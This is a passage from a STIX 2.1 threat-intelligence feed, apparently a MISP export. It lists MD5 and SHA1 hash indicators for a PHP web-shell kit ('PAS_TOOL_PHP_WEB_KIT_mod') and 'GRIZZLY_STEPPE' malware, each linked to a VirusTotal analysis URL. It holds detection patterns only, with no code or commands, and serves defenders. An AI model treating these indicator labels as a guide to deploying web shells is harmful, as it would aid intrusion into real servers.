"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'cf234fc1428c1c373329ef8968f15a18']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:40Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:40.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:40.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:40Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:40Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab44-0f7c-4a97-af10-4c3702de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab44-0f7c-4a97-af10-4c3702de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/4b67a97f89b92a25dfd52e369a363a877b3cb146fd0e18e8d638a04e52f9764b/analysis/1477574567/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab45-c924-4de1-b9ab-467c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:41.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:41.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '87daaf2f780070d27b33121dac32a551c414118b']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:41Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab46-dc58-4709-8ae0-4d1402de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:42.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:42.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b",
|
|
|
|
"pattern": "[file:hashes.MD5 = '5b3cd08ff49c275db2d43b49f8b48536']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:42Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:42.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:42.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:42Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:42Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab46-ba50-4053-81bc-4c3f02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab46-ba50-4053-81bc-4c3f02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/bbe4ea94d637978719a16cb49ad7a5e15bf30e81c9dd6c7c17a4139184dabf3b/analysis/1479979215/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab47-d8ec-4ab6-b28d-46e002de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:43.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:43.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '7cefb021fb30f985b427b584be9c16e364836739']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:43Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab47-d048-4e88-bf6a-4e7d02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:43.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:43.000Z",
|
|
|
|
"description": "GRIZZLY_STEPPE_Malware_1 - Xchecked via VT: 9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5",
|
|
|
|
"pattern": "[file:hashes.MD5 = '617ba99be8a7d0771628344d209e9d8a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:43Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:44.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:44.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:44Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:44Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab48-a968-445a-ba1b-465b02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab48-a968-445a-ba1b-465b02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/9f918fb741e951a10e68ce6874b839aef5a26d60486db31e509f8dcaa13acec5/analysis/1483140658/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab49-2f70-477a-80b0-4bee02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:45.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:45.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'd096f0d002248fbd9dc1974aacc8488055164952']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:45Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab49-3744-422a-a88d-4a9c02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:45.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:45.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501",
|
|
|
|
"pattern": "[file:hashes.MD5 = '33b50141621d210c7f9ea459df51ca0d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:45Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:46.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:46.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:46Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:46Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4a-4bd8-46c6-aa14-427502de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4a-4bd8-46c6-aa14-427502de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/7c3ddada48fbd31ee2cf3ecd9ed1ec73a9bdb9881ccbbeaa7bfbc43b315af501/analysis/1481219566/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4a-c524-42b3-8c3b-428402de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:46.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:46.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '8d44025cada9c6b944972a2654d010cc033da46e']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:46Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4b-a970-41e0-9852-4ecb02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:47.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:47.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'b3ed966817f5eec53e544e78159e3d88']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:47Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:47.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:47.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:47Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:47Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4b-a214-4922-a374-41ce02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4b-a214-4922-a374-41ce02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/9eaed1ce36dfac5ced34b5205b8e21dc49d328177336c0b0c9aee89760a45422/analysis/1480710869/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4c-a6a4-4421-86a1-481602de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:48.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:48.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'd1828dce4bf476ca07629e1613dd77c3346e2c5a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:48Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4d-83e0-4c70-a4ee-455602de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:49.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:49.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf",
|
|
|
|
"pattern": "[file:hashes.MD5 = '38f7149d4ec01509c3a36d4567125b18']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:49Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:49.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:49.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:49Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:49Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4d-09a0-46be-90b6-42d102de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4d-09a0-46be-90b6-42d102de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/7b28b9b85f9943342787bae1c92cab39c01f9d82b99eb8628abc638afd9eddaf/analysis/1483125346/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4e-0a04-45cb-972a-44e502de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:50.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:50.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6",
|
|
|
|
"pattern": "[file:hashes.SHA1 = 'a968da4b9995c5447922cd8a2e64ca1f12b7732d']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:50Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab4f-b268-4b7d-a305-406302de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:51.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:51.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6",
|
|
|
|
"pattern": "[file:hashes.MD5 = '2084cea563407db815b86b412ef7c876']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:51Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:51.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:51.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:51Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:51Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab4f-b148-40b8-9d4a-405f02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"link\"",
|
|
|
|
"misp:category=\"External analysis\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "url",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "url--5867ab4f-b148-40b8-9d4a-405f02de0b81",
|
|
|
|
"value": "https://www.virustotal.com/file/0fb3367b73539f37ce4c28287ea6587cc846f70723f1fad3793704f8d8adb6e6/analysis/1477125094/"
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab50-0eac-468d-aadb-44a902de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:52.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:52.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb",
|
|
|
|
"pattern": "[file:hashes.SHA1 = '0e887d8a4223d38d4a7f2950a8b420a86610a72a']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:52Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"sha1\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "indicator",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "indicator--5867ab50-8ac4-419f-ae00-414302de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:52.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:52.000Z",
|
|
|
|
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb",
|
|
|
|
"pattern": "[file:hashes.MD5 = 'ca22387a1c8eeb8fcf73cf745154ae63']",
|
|
|
|
"pattern_type": "stix",
|
|
|
|
"pattern_version": "2.1",
|
|
|
|
"valid_from": "2016-12-31T12:57:52Z",
|
|
|
|
"kill_chain_phases": [
|
|
|
|
{
|
|
|
|
"kill_chain_name": "misp-category",
|
|
|
|
"phase_name": "Payload delivery"
|
|
|
|
}
|
|
|
|
],
|
|
|
|
"labels": [
|
|
|
|
"misp:type=\"md5\"",
|
|
|
|
"misp:category=\"Payload delivery\"",
|
|
|
|
"misp:to_ids=\"True\""
|
|
|
|
]
|
|
|
|
},
|
|
|
|
{
|
|
|
|
"type": "observed-data",
|
|
|
|
"spec_version": "2.1",
|
|
|
|
"id": "observed-data--5867ab51-0a10-44bf-91f0-460d02de0b81",
|
|
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
|
|
"created": "2016-12-31T12:57:53.000Z",
|
|
|
|
"modified": "2016-12-31T12:57:53.000Z",
|
|
|
|
"first_observed": "2016-12-31T12:57:53Z",
|
|
|
|
"last_observed": "2016-12-31T12:57:53Z",
|
|
|
|
"number_observed": 1,
|
|
|
|
"object_refs": [
|
|
|
|
"url--5867ab51-0a10-44bf-91f0-460d02de0b81"
|
|
|
|
],
|
|
|
|
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab51-0a10-44bf-91f0-460d02de0b81",
"value": "https://www.virustotal.com/file/cec64faea1a318d599039d5d84bd73939e88814fbbbacd0b36c7372ab2415ddb/analysis/1477637515/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab52-f1f4-4003-afe1-409502de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:54.000Z",
"modified": "2016-12-31T12:57:54.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19",
"pattern": "[file:hashes.SHA1 = 'd16531f0b29ff74c25ab2972726d02324a631ac3']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:57:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"sha1\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5867ab52-5264-4faf-9aa1-4ba302de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:54.000Z",
"modified": "2016-12-31T12:57:54.000Z",
"description": "PAS_TOOL_PHP_WEB_KIT_mod - Xchecked via VT: 64ad97ddebc2f0e95b03b56cb2fff1c2c494d2c417c84572be09ae5794638f19",
"pattern": "[file:hashes.MD5 = 'ac7d3cb8db93534c30667b0b7d5cc443']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2016-12-31T12:57:54Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"md5\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\""
]
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
"created": "2016-12-31T12:57:55.000Z",
"modified": "2016-12-31T12:57:55.000Z",
"first_observed": "2016-12-31T12:57:55Z",
"last_observed": "2016-12-31T12:57:55Z",
"number_observed": 1,
"object_refs": [
"url--5867ab53-47cc-41f0-b7e5-4c5102de0b81"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5867ab53-47cc-41f0-b7e5-4c5102de0b81",
